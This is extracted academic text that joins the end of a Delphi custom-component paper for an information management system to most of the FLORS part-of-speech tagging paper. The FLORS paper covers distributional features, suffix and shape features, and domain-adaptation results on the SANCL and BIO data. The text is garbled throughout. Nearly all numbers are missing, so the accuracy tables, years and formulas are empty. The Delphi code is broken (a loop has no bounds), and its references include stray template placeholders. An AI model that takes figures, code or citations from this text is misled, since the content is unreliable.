myinidb combobox, mb, myini international conference on sensor network and computer engineering (icsnce ) combobox, vcl. graphics ;// the required unit file for creating the component. registercomponents('d ', [tmyadd]); constructor tmyadd.create(aowner:tcomponent); inherited; self.onclick:=myadd; nowday:=formatdatetime('yyyymmddhhnnss',now()); czsj:=nowday; ss :=inttostr(i); lcbh:=czsj+ss ; (self.owner.findcomponent('mb ') as tmb).mb_lcbh:=lcbh; lcmc:=(self.owner.findcomponent('mb ') as tmb).mb_lcmc; czr:=(self.owner.findcomponent('mb ') as tmb).mb_czr; //obtain name and operator letter via template component k:= owner.componentcount; //get the number of components on the form for j := to k - do begin namey:=owner.components[j].classname; if(namey='tmyedit')then(self.owner.components[j] as tbitbtn).enabled:=false//button exclusive event else if(namey='tmysave')thenif(namey='tmysave')then begin (self.owner.components[j] as tbitbtn).enabled:=true ; (self.owner.components[j] as tmysave).isadd:=true; end //other mutually exclusive operation (self.owner.findcomponent('maindbgrid') as tdbgrideh).enabled:=false; main_dataset:= (self.owner.findcomponent('main_set') as tclientdataset); main_dataset.append;//find the form on the main interface with the data after the query, and add records main_dataset.findfield('lcbh').asstring:=lcbh; //new process id main_dataset.findfield('czr').asstring:=czr; main_dataset.findfield('czsj').asstring:=czsj; main_dataset.findfield('lcjdmc').asstring:=lcjdmc; iv. test this experiment is in the computer system of information management system for experiments, the test results are as follows: custom component testing: a custom component of this article appears in the delphi visualization toolbox: figure figure . custom component renderings  in the page, drag the custom components to complete the corresponding function: figure figure . system in a page renderings v. conclusion according to the method of using custom component design in software development, the following advantages and limitations are obtained:  using the custom component technology, the management system model was initially realized, the idea of software reuse was realized, the phenomenon of repeated encoding was reduced, and the software development efficiency, maintainability and scalability were improved.  the use of custom components in the information management system and the related operation of each page through the related parameter settings are feasible and safe.  for the development of a set of software, through the development of custom components greatly reduce the development cycle, a great use of value to the actual development of software. international conference on sensor network and computer engineering (icsnce )  this method of custom components in the development of software generally for the role of ert system, for some web version of the software is not very effective. acknowledgment thanks to teacher lei hard guidance, thanks to brothers and sisters, brothers and boys to provide help. thanks for the correction of the expert group, to thank all those who helped me. references [ ] yang changchun [ed]. delphi programming guide third edition [m]. tsinghua university press, .j. clerk maxwell, a treatise on electricity and magnetism, rd ed., vol. . oxford: clarendon, , pp. – . [ ] gao zhiming. depth discussion of delphi three-tier architecture [j]. programmer. ( )k. elissa, “title of paper if known,” unpublished. [ ] chen dongsheng. system analysis of multi-tier application based on datasnap technology [j]. computer knowledge and technology. ( ). [ ] he dinghua. three-tier client-server database application delphi implementation [j]. information technology and information technology . ( ). [ ] yin kaicheng, wan xiaodong. application of three-tier distributed structure database based on delphi [j]. tangshan university ,. ( ). [ ] miaofei hua, zhou qiaoshu. sql server database management system advantages [j]. journal of changchun normal university, ( ): - + . [ ] li wensheng. implementing three-tier client / server database application program in delphi [j] .computer engineering. ( ). [ ] wu xiaolin, jiang xian-gang, gao yanjin. research on connection technology of multi-tier database application system based on delphi [j] .jia dong jiao tong da xue bao . ( ). flors: fast and simple domain adaptation for part-of-speech tagging flors: fast and simple domain adaptation for part-of-speech tagging tobias schnabel department of computer science cornell university tbs @cornell.edu hinrich schütze center for information & language processing university of munich inquiries@cislmu.org abstract we present flors, a new part-of-speech tag- ger for domain adaptation. flors uses ro- bust representations that work especially well for unknown words and for known words with unseen tags. flors is simpler and faster than previous domain adaptation methods, yet it has significantly better accuracy than several baselines. introduction in this paper we describe flors, a part-of-speech (pos) tagger that is fast in training and tagging, uses local context only (as opposed to finding the optimal tag sequence for the entire sentence), per- forms robustly on target domains (tds) in unsu- pervised domain adaptation (da) and is simple in architecture and feature representation. flors constructs a robust representation of the local context of the word v that is to be tagged. this representation consists of distributional fea- tures, suffixes and word shapes of v and its local neighbors. we show that it has two advantages. first, since the main predictors used by flors are distributional features (not the word’s identity), flors predicts unseen tags of known words bet- ter than prior work on da for pos. second, since flors uses representations computed from unla- beled text, representations of unknown words are in principle of the same type as representations of known words; this property of flors results in better performance on unknown words compared to prior work. these two advantages are especially beneficial for tds that contain high rates of unseen tags of known words and high rates of unknown words. we show that flors achieves excellent da tagging results on the five domains of the sancl shared task (petrov and mcdonald, ) and outperforms three state-of-the-art taggers on blitzer et al.’s ( ) biomedical data. flors is also simpler and faster than other pos da methods. it is simple in that the input repre- sentation consists of three simple types of features: distributional count features and two types of binary features, suffix and shape features. many other word representations that are used for improving general- ization (e.g., (brown et al., ; collobert et al., )) are costly to train or have difficulty han- dling unknown words. our representations are fast to build and can be created on-the-fly for unknown words that occur during testing. the learning architecture is simple and fast as well. we train k binary one-vs-all classifiers that use local context only and no sequence informa- tion (where k is the number of tags). thus, tag- ging complexity is o(k). many other learning se- tups for da are more complex; e.g., they learn rep- resentations (as opposed to just counting), they learn several classifiers for different subclasses of words (e.g., known vs. unknown) or they combine left-to- right and right-to-left taggings. the next two sections describe experimental data, setup and results. results are discussed in section . we compare flors to alternative word representa- tions in section and to related work in section . section presents our conclusions. experimental data and setup data. our source domain is the penn treebank (marcus et al., ) of wall street journal (wsj) transactions of the association for computational linguistics, ( ) – . action editor: sharon goldwater. submitted / ; revised / ; published / . c© association for computational linguistics. text. following blitzer et al. ( ), we use sections - for training and , wsj sentences from as unlabeled data in training. we evaluate on six different tds. the first five tds (newsgroups, weblogs, reviews, answers, emails) are from the sancl shared task (petrov and mcdonald, ). additionally, the sancl dataset contains sections and of the wsj for in-domain development and testing, respectively. each sancl td has an unlabeled training set of , sentences and development and test sets of about labeled sentences each. the sixth td is bio, the penn biotreebank data set distributed by blitzer. it consists of dev and test sets of sen- tences each and , unlabeled sentences. classification setup. similar to svmtool (giménez and màrquez, ) and choi and palmer ( ) (henceforth: c&p), we use local context only for tagging instead of performing sequence classifi- cation. for a word w occurring as token vi in a sen- tence, we build a feature vector for a local window of size l + around vi. the representation of the object to be classified is this feature vector and the target class is the pos tag of vi. we use the linear l -regularized l -loss svm implementation provided by liblinear (fan et al., ) to train k one-vs-all classifiers on the train- ing set where k is the number of pos tags in the training set (in our case k = ). we train with un- tuned default parameters; in particular, c = . in the special case of linear svms, the value of c does not need to be tuned exhaustively as the solution re- mains constant after c has reached a certain thresh- old value c∗ (keerthi and lin, ). training can easily be parallelized by giving each binary svm its own thread. windows. the local context for tagging token vi is a window of size l + centered around vi: (vi−l, . . . , vi, . . . , vi+l). we pad sentences on either side with 〈boundary〉 to ensure sufficient con- text for all words. given a mapping f from words to feature vectors (see below), the representation f of a token vi is the concatenation of the l + word vectors in its window f(vi) = f(vi−l)⊕ . . .⊕f(vi+l) where ⊕ is vector concatenation. word features. we represent each word w by four components: (i) counts of left neighbors, (ii) counts of right neighbors, (iii) binary suffix features and (iv) binary shape features. these four compo- nents are concatenated: f(w) = f left(w)⊕f right(w)⊕f suffix(w)⊕f shape(w) we consider these sources of information equally important and normalize each of the four compo- nent vectors to unit length. normalization also has a beneficial effect on svm training time because it alleviates numerical problems (fan et al., ). distributional features. we follow a long tra- dition of older (finch and chater, ; schütze, ; schütze, ) and newer (huang and yates, ) work on creating distributional features for pos tagging based on local left and right neighbors. specifically, the ith entry xi of f left(w) is the weighted number of times that the indicator word ci occurs immediately to the left of w: xi = tf (freq (bigram(ci, w))) where ci is the word with frequency rank i in the cor- pus, freq (bigram(ci, w)) is the number of times the bigram “ci w” occurs in the corpus and we weight the non-zero frequencies logarithmically: tf(x) = + log(x). tf-weighting has been used by other re- searchers (huang and yates, ) and showed good performance in our own previous work. f right(w) is defined analogously. we restrict the set of indicator words to the n = most fre- quent words in the corpus. to avoid zero vectors, we add an entry xn+ to each vector that counts omitted contexts: xn+ = tf   ∑ j:j>n freq (bigram(cj, w))   we compute distributional vectors on the joint corpus dall of all labeled and unlabeled text of source domain and td. the text is preprocessed by lowercasing everything – which is often done when computing word representations, e.g., by turian et al. ( ) – and by padding sentences with 〈boundary〉 tokens. suffix features. suffixes are promising for da because basic morphology rules are the same in dif- ferent domains. in contrast to other work on tagging model classifier features tnt hmm p−{ , , }, v , suffixes (for oovs) stanford bidir. memm p±{ , , }, v±{ , }, affixes, orthography svmtool svm p±{ , , , }, v±{ , , , }, affixes, orthography, word length c&p svm p±{ , , , }, v±{ , , , }, affixes, orthography flors svm distributions of v±{ , , }, suffixes, orthography table : overview of baseline taggers and flors. vi: token, pi: pos tag. positions included in the sets of token indices are relative to the position i of the word v to be tagged; e.g., p±{ , , } is short for {p− , p− , p− , p , p , p }. to represent tokens vi, models – use vocabulary indices and flors uses distributional representations. models – use combinations of features (e.g., tag-word) as well. (e.g., ratnaparkhi ( ), toutanova et al. ( ), miller et al. ( )) we simply use all (lowercase) suffixes to avoid the need for selecting a subset of suffixes; and we treat all words equally as opposed to using suffix features for only a subset of words. for suffix s, we set the dimension corresponding to s in f suffix(w) to if lowercased w ends in s and to otherwise. note that w is a suffix of itself. shape features. we use the berkeley parser word signatures (petrov and klein, ). each word is mapped to a bit string encompassing binary indicators that correspond to different orthographic (e.g., does the word contain a digit, hyphen, upper- case character) and morphological (e.g., does the word end in -ed or -ing) features. there are unique signatures in wsj. we set the dimension of f shape(w) that corresponds to the signature of w to and all other dimensions to . we note that the shape features we use were designed for english and prob- ably would have to be adjusted for other languages. baselines. we address the problem of unsuper- vised domain adaptation for pos tagging. for this problem, we consider three types of baselines: (i) high-performing publicly available systems, (ii) the taggers used at sancl and (iii) pos da results published for bio. most of our experiments use taggers from cate- gory (i) because we can ensure that experimental conditions are directly comparable. the four base- lines in category (i) are shown in table . three have near state-of-the-art performance on wsj: svmtool (giménez and màrquez, ), stanford one could also compute these suffixes for _w (w prefixed by underscore) instead of for w to include words as distinguish- able special suffixes. we test this alternative in table , line . (toutanova et al., ) (a birectional memm) and c&p. tnt (brants, ) is included as a represen- tative of fast and simple hmm taggers. in addition, c&p is a tagger that has been extensively tested in da scenarios with excellent results. unless other- wise stated, we train all models using their default configuration files. we use the optimized parameter configuration published by c&p for the c&p model. test set results will be compared with the sancl taggers (category (ii)) at the end of section . as far as category (iii) is concerned, most work on pos da has been evaluated on bio. we discuss our concerns about the bio evaluation sets in sec- tion , but also show that flors beats previously published results on bio as well (see table ). experimental results we train k binary svm classifiers on the training set. a token in the test set is classified by building its feature vector, running the classifiers on it and then assigning it to the pos class whose one-vs-all liblinear classifier returns the largest score. results for all accuracy (accuracy for all to- kens) and oov accuracy (accuracy for tokens not occurring in the labeled wsj data) are reported in table . results with an asterisk are significantly worse than a column’s best result using mcnemar’s test (p < . ). we use the same test and p-value throughout this paper. the basic flors model (table , line ) uses window size (l = ). each word in the window has distributional features ( left and right), , suffix features and shape features. the final feature vector for a token has a dimensionality of about , , but is very sparse. flors outperforms all baselines on the five tds newsgroups reviews weblogs answers emails wsj all oov all oov all oov all oov all oov all oov tnt . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . stanford . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . . svmtool . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . . c&p . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . . f l o r s basic . . . . . . . . . ∗ . . . n = . . . . . . . . . . . ∗ . v ± { , , } n = . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ no suffixes . . . . ∗ . . . ∗ . ∗ . ∗ . . ∗ . no shapes . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . . . ∗ . ∗ v ± { , } n = . ∗ . . ∗ . . . . . . ∗ . . ∗ . no suffixes . . ∗ . . . . . . . . . . no shapes . . . . . . . . . ∗ . . . l = . ∗ . ∗ . ∗ . . ∗ . . ∗ . . ∗ . . ∗ . l-to-r . ∗ . . . . . . . . . . ∗ . voc. indices . . . . . . . . . ∗ . . . table : tagging accuracy of four baselines and flors on the dev sets. the table is structured as follows: baselines (lines – ), basic flors setup (lines – ), effect of omitting one of the three feature types if the word to be tagged is changed compared to the basic flors setup (lines – ) and if the word to be tagged is not changed compared to basic flors (lines – ), effect of three important configuration choices on tagging accuracy: window size (line ), inclusion of prior tagging decision (line ) and vocabulary index (line ). n: number of indicator words. l + : size of the local context window. lines – : only the neighbors of v are modified compared to basic (line ). lines – : all five token representations (including v ) are modified. a column’s best result is bold. (line vs. lines – ). only in-domain on wsj, three baselines are slightly superior. the baselines are slightly better on all accuracy because they were designed for tagging in-domain data and use feature sets that have been found to work well on the source domain. generally, c&p performs best for da among the baselines. on answers and wsj, how- ever, stanford has better overall accuracies. these results are in line with c&p. on lines – , we investigate how different mod- ifications of the basic flors model affect perfor- mance. first, we examine the effect of leaving out components of the representation: distributional fea- tures (f left(w), f right(w)), suffixes (f suffix(w)) and shape features (f shape(w)). distributional features boost performance in all domains: all and oov accuracies are consistently worse for n = (line ) than for n ∈ { , } (lines & ). flors with n = has better oov accuracies in of domains. however, all accu- racy for flors with n = is better in the major- ity of domains. the main result of this comparison is that flors does not seem to be very sensitive to the value of n if n is large enough. shape features also improve results in all do- mains, with one exception: emails (lines vs ). for emails, shape features decrease all accuracy by . and oov accuracy by . . this may be due to the fact that many oovs are nnp/nn and that tagging conventions for nnp/nn vary between do- mains. see section for discussion. performance benefits from suffixes in all domains but weblogs (lines vs ). weblogs contain many foreign names such as abdul and yasim. for these words, shapes apparently provide better informa- tion for classification than suffixes. all accura- cies suffer little when leaving out suffixes, but the feature space is much smaller: about dimen- sions. thus, for domains where we expect few oovs, omitting suffix features could be considered. lines – omit one of the components of f(vi) for all five words in the local context: i ∈ {− ,− , , , }. lines – omit the same com- ponents for the neighbor words only – i.e., i ∈ {− ,− , , } – and leave f(v ) unchanged. of the × all accuracies on lines – are worse than flors basic, are better. the largest differ- ences are . for newsgroups and . for reviews (lines vs ), but differences for the other domains are negligible. this shows that the most important feature representation is that of v (not surprisingly) and that the distributional features of the other words can be omitted at the cost of some loss in accuracy if a small average number of active features is desired. another flors parameter is the size of the local context. surprisingly, oov accuracies benefit a bit in four domains if we reduce l from to (lines vs ). however, all accuracy consistently drops in all six domains. this argues for using l = , i.e., a window size of . results for left-to-right (l-to-r) tagging are given on line . similar to svmtool and c&p, each sen- tence is tagged from left to right and previous tag- ging decisions are used for the current classification. in this setting, we use the previous tag pi− as one additional feature in the feature vector of vi. the effect of left-to-right is similar to the effect of omitting suffixes: oov accuracies go up in some domains, but all accuracies decrease (except for an increase of . for reviews). this is in line with the experiments in (schnabel and schütze, ) where sequential information in a crf was not ro- bust across domains. oov tagging may benefit from correct previous tags because the larger left context that is indirectly made available by left-to-right tag- ging compensates partially for the lack of informa- tion about the oov word. in contrast to standard approaches to pos tag- ging, the flors basic representation does not con- tain vocabulary indices. line shows what hap- pens if we add them; the dimensionality of the fea- ture vector is increased by |v | – where v is the training set vocabulary – and in training one binary feature is set to one for each of the five local con- text words. performance is almost indistinguishable from flors basic, suggesting that only using suf- fixes – which can be viewed as “ambiguous” vocab- ulary indices, e.g., “at” is on for “at”, “mat”, “hat”, “laundromat” etc – is sufficient. in summary, we find that distributional features, word signatures and suffixes all contribute to suc- cessful pos da. factors with only minor impact on performance are the number of indicator words used for the distributional representations, the win- dow size l and the tagging scheme (l-to-r vs. non- l-to-r). unknown words and known words behave differently with respect to certain feature choices. the different behavior of unknown and known words suggests that training and optimizing two sep- arate models – an approach used by svmtool – would further increase tagging accuracy. note that there has been at least one publication (schnabel and schütze, ) on optimizing a separate model for unknown words that has in some cases better per- formance on oov accuracy than what we publish here. however, this would complicate the architec- ture of flors. we opted for a maximally simple model in this paper, potentially at the cost of some performance. test set results. table reports results on the test sets. flors again performs significantly better on all five tds, both on all and oov. only in-domain on wsj, all performance is worse. finally, we compare our results to the pos taggers for which performance was reported at sancl (petrov and mcdonald, , ta- ble ). constituency-based parsers – which also tag words as a by-product of deriving complete parse trees – are excluded from the comparison be- cause they are trained on a richer representation, the syntactic structure of sentences. flors’ results are better than the best non-parsing-based results at sancl , which were accuracies of . on newsgroups (hit), . on reviews (hit) and . on answers (ims- ). discussion advantages of flors representation. as we can see in table , the main representational difference between flors and the other taggers is that the flors representation does not include vocabulary indices of the word to be tagged or its neighbors – the flors vector only consists of distributional, suffix and shape features. this is an obvious advantage for oovs. in other representational schemes, oovs have representa- tions that are fundamentally different from known schnabel and schütze ( ) report oov accuracies of . (newsgroups), . (reviews), . (weblogs), . (answers), . (emails) and . (bio) for their basic model and even higher oov accuracies if parameters are optimized on a per-domain basis. dcu-paris is listed in the dependency parser tables, but dcu-paris results are derived from a constituency parser. dcu also developed sophisticated preprocessing rules for the different domains, which can be viewed as a kind of manual domain adaptation. newsgroups reviews weblogs answers emails wsj all oov all oov all oov all oov all oov all oov tnt . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . stanford . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . . svmtool . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . . c&p . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . . flors basic . . . . . . . . . . . ∗ . table : tagging accuracy of four baselines and flors on the test sets. newsgroups reviews weblogs answers emails wsj bio pc t to ke ns unknown tag . . . . . . . oov . . . . . . . unseen word+tag . . . . . . . ac cu ra cy on un se en w or d+ ta g tnt . . . . . . . stanford . . . . . . . svmtool . . . . . . . c&p . . . . . . . flors basic . . . . . . . table : top: percentage of unknown tags, oovs and unseen word+tag combinations (i.e., known words tagged with unseen tags) in the dev sets. bottom: tagging accuracy on unseen word+tag. words – since their vocabulary index does not oc- cur in the training set and cannot be used for predic- tion. in contrast, given enough unlabeled td data, flors represents known and unknown words in es- sentially the same way and prediction of the correct tag is easier. this explanation is supported by the experiments in table : flors beats all other sys- tems on oovs – even in-domain on wsj. in our analysis we found that apart from better handling of oovs there is a second beneficial ef- fect of distributional representations: they facilitate the correct tagging of known words occurring with tags unseen in the training set, which we call un- seen word+tags. table gives statistics on this case and shows that unseen word+tags occur at least two times as often out-of-domain (e.g., . % for we- blogs) than in-domain (. % for wsj). the bottom part of the table shows performance of the five tag- gers on unseen word+tags. flors is the top per- former on all seven domains, with large differences of more than % in some domains. the explanation is similar to the oov case: flors does not restrict the set of possible pos’s of a word. the other taggers in table use the vocabu- lary index of the word to be tagged and will therefore give a strong preference to seen tags. since flors uses distributional features, it can more easily assign an unseen tag as long as it is compatible with the overall pattern of distribution, suffixes and shapes typical of the tag. c&p also perform relatively well on unseen word+tag due to the ambiguity classes in their model, but flors representations are better for every domain. we take these results to mean that constraints on a word’s possible pos tags may well be helpful for in-domain data, but for out-of-domain data an overly strong bias for a word’s observed tags is harmful. it is important to stress that representations sim- ilar to flors representations have been used for a long time; we would expect many of them to have similar advantages for unseen word+tags. e.g., brown clusters (brown et al., ) and word em- beddings (collobert et al., ) are similar to flors in this respect. however, flors represen- tations are extracted by simple counting whereas the computation of brown clusters or word embeddings is much more expensive. the speed with which flors representations can be computed is partic- ularly beneficial when taggers need to be adapted to new domains. flors can easily adapt its rep- resentations on the fly – as each new occurrence of a word is encountered, the counts that are the basis for the xi can simply be incremented. we present a direct comparison of flors representations with other representations in section . “local context” vs. sequence classification. the most common approach to pos tagging is to tag a sentence with its most likely sequence; in contrast, independent tagging of local context is not guaran- teed to find the best sequence. recent work on en- glish suggests that window-based tagging can per- form as well as sequence-based methods (liang et al., ; collobert et al., ). toutanova et al. ( ) report similar results. in our experiments, we also did not find consistent improvements when we incorporated sequence constraints (table , line ). however, there may be languages and appli- cations involving long-distance relationships where local-context classification is suboptimal. local-context classification has two advantages compared to sequence classification. (i) it simplifies the classification and tagging setup: we can use any existing statistical classifier. sequence classification limits the range of methods that can be applied; e.g., it is difficult to find a good crf implementation that can handle real-valued features – which are of criti- cal importance for our representation. (ii) the time complexity of flors in tagging is o(skf) where s is the length of the sentence, k is the number of tags and f is the number of non-zero fea- tures per local-context representation. in contrast, sequence decoding complexity is o(sk f). this difference is not of practical importance for stan- dard english pos sets, but it could be an argument against sequence classification for tagging problems with much larger tag sets. in summary, replacing sequence classification with local-context classification is attractive for large-scale, practical tagging. what da can and cannot do. despite the supe- rior da tagging results we report for flors in this paper, there is still a gap of %– % (depending on the domain) between in-domain wsj accuracy and da accuracy on sancl. in our analysis of this gap, we found some evidence that da performance can be further improved – especially as more unlabeled td data becomes available. but we also found two reasons for low performance that unsupervised da cannot do anything about: differences in tag sets – or unknown tags – and differences in annotation guide- lines. table shows that unknown tags occur in five of the seven tds at rates between % (weblogs) and % (bio). each token that is tagged with an un- known tag is necessarily an error in unsupervised da. furthermore, the unknown tag can also im- pact tagging accuracy in the local context – so the unknown tag rates in table are probably lower bounds for the error that is due to unknown tags. based on these considerations, it is not surprising that tagging accuracy (e.g., of flors basic) and unknown tag rate are correlated as we can see in ta- bles , and ; e.g., we get the highest accuracies in the two domains that do not have unknown tags (weblogs and wsj) and the lowest accuracy in the domain with the highest rate (bio). since unknown tags cannot be predicted correctly, one could simply report accuracy on known tags. however, given the negative effect of unknown tags on tagging accuracy of the local context in which they occur, excluding unknown tags does not fully address the problem. for this reason, it is probably best to keep the common practice of simply report- ing accuracy on all tokens, including unknown tags. but the percentages of unknown tags should also be reported for each dataset as a basis for a more accu- rate interpretation of results. another type of error that cannot be avoided in unsupervised da is due to differences in annota- tion guidelines. there are a few such problems in sancl; e.g., file names like “services.doc” are an- notated as nn in the email domain. but their dis- tributional and grammatical behavior is more simi- lar to nnps; as a consequence, most file names are incorrectly tagged. in general, it is difficult to dis- criminate nns from nnps. the penn treebank an- notation guidelines (santorini, ) are compatible with either tag in many cases and it may simply be impossible to write annotation guidelines that avoid these problems (cf. manning ( )). nn-nnp in- consistencies are especially problematic for oov tagging since most oovs are nns or nnps. for example, there is a special tag add in the web do- main for web addresses. the last two words of the sentence “i would like to host my upcoming website to/in liquid- web.com/add” are mistagged by stanford tagger as “... to/to liquidweb.com/vb”. so the missing tag in this case also affects the tagging of surrounding words. bio dev wsj train oov all all nn . . . jj . . . nns . . . nnp . . . nnps . . . table : frequency of some tags (percent of tokens) for bio dev and wsj train. while the amount of inconsistent annotation is limited for sancl, it is a serious problem for bio. table shows that the proportion of nnps in bio is less than a tenth of that in wsj (. in bio vs. . in wsj). this is due to the fact that many bio- specific names, in particular genes, are annotated as nn. in contrast, the distributionally and orthograph- ically most similar names in wsj are tagged as nnp. for example, we find “one cell was teased out, and its dna/nnp extracted” in wsj vs. “dna/nn was isolated” in bio. standard setup nnp→nn all oov all oov tnt . ∗ . ∗ . ∗ . ∗ stanford . ∗ . ∗ . ∗ . ∗ svmtool . ∗ . ∗ . . ∗ c&p . ∗ . ∗ . ∗ . ∗ f l o r s basic . . . . n = . . . . n = . ∗ . ∗ . ∗ . ∗ no suffixes . ∗ . ∗ . ∗ . ∗ no shapes . ∗ . ∗ . ∗ . ∗ l = . . . . table : tagging accuracy on bio dev. nnp→nn results were obtained by replacing nnps with nns. given this large discrepancy in the frequency of the tag nnp – which arguably is due to different annotation guidelines, not due to underlying differ- ences between the two genres – bio should proba- bly not be used for evaluating da. this is why we did not include it in our comparison in table . for sake of completeness, we provide tagging ac- curacies for bio in table , “standard setup”. the results are in line with sancl results: flors beats the baselines on all and oov accuracies. however, if we build the nn bias into our model by simply replacing all nnp tags with nn tags, then accuracy goes up by % on all and by almost % on oov. even tnt, the most basic tagger, achieves all/oov accuracy of . / . , better than any method in the standard setup. these accuracies are well above those in (blitzer et al., ) and (huang and yates, ). since simply replacing nnps with nns has such a large effect, bio cannot be used sensibly for eval- uating da methods. in practice, it is not possible to separate “true” improvements due to generic bet- ter da from elements of the proposed method that simply introduce a negative bias for nnp. in summary, when comparing different da meth- ods caution should be exercised in the choice of do- mains. in particular, the effect of unknown tags should be made transparent and the gold standards should be analyzed to determine whether the task addressed in the td differs significantly in some as- pects from that addressed in the source domain. comparison of word representations our approach to da is an instance of representation learning: we aim to find representations that are ro- bust across domains. in this section, we compare flors with two other widely used representation learning methods: (i) brown clusters (brown et al., ) and (ii) c&w embeddings, the word embed- dings of collobert et al. ( ). we use f dist(w) = f left(w)⊕f right(w) to refer to our own distributional word representations (see section ). the perhaps oldest and most frequently used low- dimensional representation of words is based on brown clusters. typically, prefixes of brown clus- ters (brown et al., ) are added to increase the robustness of pos taggers (e.g., toutanova et al. ( )). computational costs are high (quadratic in the vocabulary size) although the computation can be parallelized (uszkoreit and brants, ). more recently, general word representations (col- lobert et al., ; turian et al., ) have been used for robust pos tagging. these word represen- tations are typically trained on a large amount of un- labeled text and fine-tuned for specific nlp tasks. similar to brown clusters, they are low-dimensional and can be used as features in many nlp tasks, ei- ther alone or in combination with other features. to compare f dist(w) (our distributional repre- sentations) with brown clusters, we induced brown clusters on the joint corpus data dall (see section ) using the publicly available implemen- tation of liang ( ). we padded sentences with 〈boundary〉 tokens on each side and used path prefixes of length , , and as features for each word (cf. ratinov and roth ( ), turian et al. ( )). c&w embeddings are provided by collobert et al. ( ): -dimensional vectors for , words from wsj, trained on wikipedia. similar to our dis- tributional representations fdist(w), the embeddings also contain a 〈boundary〉 token (which they call padding). moreover, they have a special em- bedding for unknown words (called unknown) which we use whenever we encounter a word that is not in their lookup table. we preprocess our raw tokens the same way they do (lowercase and replace sequences of digits by “ ”) before we look up a rep- resentation during training and testing. we replaced the distributional features in our ba- sic setup by either brown cluster features or c&w embeddings. table repeats lines and of table and gives results of the modified flors setup. all three representations improve both all and oov accuracies in all domains. fdist outperforms brown in all cases except for oov on emails. brown may suffer from noisy data; cleaning meth- ods have been used in the literature (liang, ; turian et al., ), but they are not unproblematic since a large part of the data available is lost, which results in more unknown words. brown and fdist can be directly compared since they were trained on exactly the same data. fdist and c&w are harder to compare directly because there are many differences. (i) c&w is trained on a much larger dataset. one consequence of this is that oov accuracy on wsj may be higher because some words that are unknown for other methods are actually known to c&w. (ii) c&w vectors are not trained on the sancl td data sets – this gives fdist an advantage. (iii) c&w vectors are not trained on the wsj. again, this could give fdist an advantage. (iv) c&w and fdist are fundamentally different in the way they handle unknown words. c&w has a lim- ited vocabulary and must replace all words not in this vocabulary by the token unknown. in con- trast, fdist can create a meaningful individual repre- sentation for any oov word it encounters. our flors tagger provides best all accuracies in all domains but wsj, where c&w has best re- sults. the good performance of c&w is rather un- surprising since the embeddings were created for the , most frequent words of the wsj and thus cover the wsj domain much better. also, wsj was used to tune parameters during development. as with our previous experiments, oov results on emails seem slightly more sensitive to parameter choices than on other domains (recall the discussion of this issue in section ). in summary, we have shown that fdist represen- tations work better for pos da than brown clus- ters. furthermore, the evidence we have presented suggests that fdist are comparable in performance to c&w embeddings if not better for pos da. the most important difference between fdist and brown / c&w is that fdist are much simpler and much faster to compute. they are simpler because they are just slightly transformed counts in contrast to the other two approaches, which solve complex optimization problems. fdist can be computed effi- ciently through simple incrementation in one pass through the corpus. in contrast, the other two ap- proaches are an order of magnitude slower. related work unsupervised da methods can be broadly put into four categories: representation learning and constraint-based frameworks – which require some tailoring to a task – and instance weighting and boot- strapping – which can be more generally applied to a wide range of problems. since many approaches are application-specific, we focus on the ones that have been applied to pos tagging. representation learning. we already discussed two important approaches to representation learning in section : c&w embeddings and brown clusters. blitzer et al.’s ( ) structural correspondence learning (scl) supports da by creating similar representations for correlated features in the pivot feature space. this is a potentially powerful method. flors is simpler in that correlations are made directly accessible to the supervised learner. newsgroups reviews weblogs answers emails wsj all oov all oov all oov all oov all oov all oov f l o r s fdist(w), n= . . . . . . . . . . . . fdist(w), n= . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ . ∗ c&w for fdist(w) . . . ∗ . ∗ . . ∗ . . . . . . brown for fdist(w) . ∗ . ∗ . ∗ . ∗ . . . ∗ . ∗ . ∗ . . ∗ . table : tagging accuracy of different word representations on the dev sets. line corresponds to flors basic. n: number of indicator words. a column’s best result is bold. moreover, flors representations consist of simple counts whereas scl solves a separate optimization problem for each pivot feature. umansky-pesin et al. ( ) derive distributional information for oovs by running web queries. this approach is slow since it depends on a search engine. ganchev et al. ( ) successfully use search logs. this is a promising enhancement for flors. huang and yates ( ) evaluate crfs with dis- tributional features. they examine lower dimen- sional feature representations using svd or the la- tent states of an unsupervised hmm. they find bet- ter accuracies for their hmm method than blitzer et al. ( ); however, they do not compare them against a crf baseline using distributional features. in later work, huang and yates ( ) add the la- tent states of multiple, differently trained hmms as features to their crf. huang and yates ( ) ar- gue that finding an optimal feature representation is computationally intractable and propose a new framework that allows prior knowledge to be inte- grated into representation learning. latent sequence states are a form of word repre- sentation. thus, it would be interesting to compare them to the non-sequence-based distributional rep- resentation that flors uses. constraint-based methods. rush et al. ( ) use global constraints on oovs to improve out-of- domain tagging. although constraints ensure con- sistency, they require careful manual engineering. distributional features can also be seen as a form of constraint since feature weights will be shared among all words. subramanya et al. ( ) construct a graph to en- courage similar n-grams to be tagged similarly, re- sulting in moderate gains in one domain, but no gains on bio when compared to self-training. the reason could be an insufficient amount of unsuper- vised data for bio ( , sentences). our ap- proach does not seem to suffer from this problem. bootstrapping. both self-training (mcclosky et al., ) – which uses one classification model – and co-training (blum and mitchell, ) – which uses ≥ models – have been applied to pos tagging. self-training usually improves a pos baseline only slightly if at all (huang et al., ; huang and yates, ). devising features based on labeled in- stances (instead of training on them) has been more successful (florian et al., ; søgaard, ). chen et al. ( ) use co-training for da. in each round of their algorithm, both new training instances from the unlabeled data and new features are added. their model is limited to binary classification. the co-training method of kübler and baucom ( ) trains several taggers and adds sentences from the td to the training set on which they agree. they report slight, but statistically significant increases in accuracy for pos tagging of dialogue 